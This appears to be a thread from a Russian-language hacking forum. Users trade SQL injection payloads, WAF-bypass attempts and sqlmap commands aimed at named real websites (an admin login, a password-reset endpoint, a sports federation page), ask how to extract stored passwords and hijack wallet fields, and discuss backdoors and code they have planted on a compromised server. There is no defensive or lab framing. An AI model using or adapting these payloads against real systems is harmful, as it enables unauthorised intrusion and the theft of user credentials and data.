Есть возможность обойти? Code: $dir = './img/'; $name = $dir . basename($_FILES['uploadfile']['name']); $ext = substr($_FILES['uploadfile']['name'],strpos($_FILES['uploadfile']['name'],'.'),strlen($_FILES['uploadfile']['name'])-1); $filetypes = array('.bmp','.jpg','.png','.jpeg','.gif','.BMP','.JPG','.PNG','.JPEG','.GIF'); if(!in_array($ext,$filetypes)){ echo "Данный формат файлов не поддерживается"; }else{ if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $name)) { echo "Изображение загружено"; } else { echo "Ошибка"; } }
Здравствуйте, помогите пожалуйста извлечь пароли, никак не получается (пароли идут blob) Code: doma-pizza.ru/admin/login/ поле login admin') AND EXTRACTVALUE(7257,CONCAT(0x5c,0x717a7a7871,(SELECT (ELT(7257=7257,1))),0x717a787671)) AND ('sIKG'='sIKG&password=admin&submit=%D0%92%D1%85%D0%BE%D0%B4 back-end DBMS: MySQL >= 5.0.0 banner: '5.7.21-20-beget-5.7.21-20-1-log' Таблица: PS_USER Колонки: PS_USER_LOGIN,PS_USER_PASSWORD Пробовал так как тут указывали, но ничего не вышло https://forum.antichat.ru/threads/431199/page-53#post-4390194
Не подскажите, есть сайт на ColdFusion 2018, два дня назад поставил свой код в js файл, проблема в том, что мой код то появляется, то его нету это со стороны обычного пользователя. Попытался 10 раз обновить страницу его нет, зашел на следующий день код есть. А если через шелл чекнуть то мой код постоянно в файле. Не понял истинную причину такого поведения. Вроде сайт на одном сервере, кэш сервера - прошло достаточно времени, кэш бразуера - я его постоянно чищу
Всем привет. Возник вопрос. Есть запрос вида Code: https://site/dynamic/pin/?pin=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb&activate=1 Получаю ошибку: Code: SQLSTATE[42000]: Syntax error or access violation: 3057 Incorrect user-level lock name 'WP_bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb' Гугление ошибки привело к тому, что возможно я имею дело с функцией GET_LOCK() в mysql. И возможен такой вектор: Code: (concat(version(),repeat(0x1,99)),0) Но к сожалению у меня не получается правильно составить запрос. Как отбросить префикс базы, который вываливается в ошибке и корректно составить запрос? Спасибо, буду признателен за помощь.
отписал в пм, также бэкдор который поставил на php файл (находится на соседней папке) нормально работает, а вот с js такие проблемы
Опять ваф, помогите обойти, фильт union select Code: https://www.lfv.li/nationalmannschaften/u21-nationalmannschaft/mannschaft/detail/?tx_cfcleagueext_pi4%5BprofileId%5D=2057+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50+--+
Нужна помощь В коде сайта есть код на привязку кошелька Работает он примерно так: Code: SELECT COUNT(*) FROM db_purse WHERE purse1='{$_GET["purse"]}' Если кошелёк не найден то выполняеться запрос Code: UPDATE db_purse SET purse1='{$_GET["purse"]}' WHERE user_id='$id' Но установить purse1 меня не устрайвает в таблице есть ещё purse2 и purse3, есть ли какаето возможность сформировать $_GET["purse"] таким образом чтобы подменить purse2 или purse3?
Попробуй сначала составить ЖЕЛАЕМЫЙ запрос, который приведет к изменению значения поля, при этом не меняя исходный, а только дополняя его. После этого станет понятно, что модифицировать.
Приветствую! Помогите правильно составить POST запрос для sqlmap Code: bronze=on&exclude-legends=on&formation=451&gold=on&leagues%5b%5d=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&player-leagie-box=on&silver=on
Get Sqlmap.py --url "site.com/index.php? bronze=on&exclude-legends=on&formation=451&gold=on&leagues%5b%5d=*&player-leagie-box=on&silver=on" --dbs --risk=3 --level=3 --random-agent Post Sqlmap.py --url "site.com/index.php" --data=" bronze=on&exclude-legends=on&formation=451&gold=on&leagues%5b%5d=*&player-leagie-box=on&silver=on" --dbs --risk=3 --level=3 --random-agent Суд по всему это выхлоп с акуши, так что я бы сильно не надеялся раскрутить,ещё к тому же слепую, дампится будет хрен пойми сколько, без шела никак
Помогите пожалуйста, возвращает пустой результат Code: --url="https://eos.aidainternational.org/ResetPassword/3297bc2d-815c-46fd-9488-57433cb3de5a*" --flush-session --risk=3 --level=3 -D dbo -T UserProfiles --dump
Привет. Подскажите, плиз. Как правильно видоизменить нагрузку вида Code: 'OR(if(now()=sysdate(),sleep(3),0))OR'*/ для того чтобы начать перебирать символы, например, чтобы получить значение Code: version() базы данных. Не хватает понимания По идее так Code: 'OR(if(substring(version((),1,1)='m',sleep(3),0))OR'*/ , да? Cпасибо.
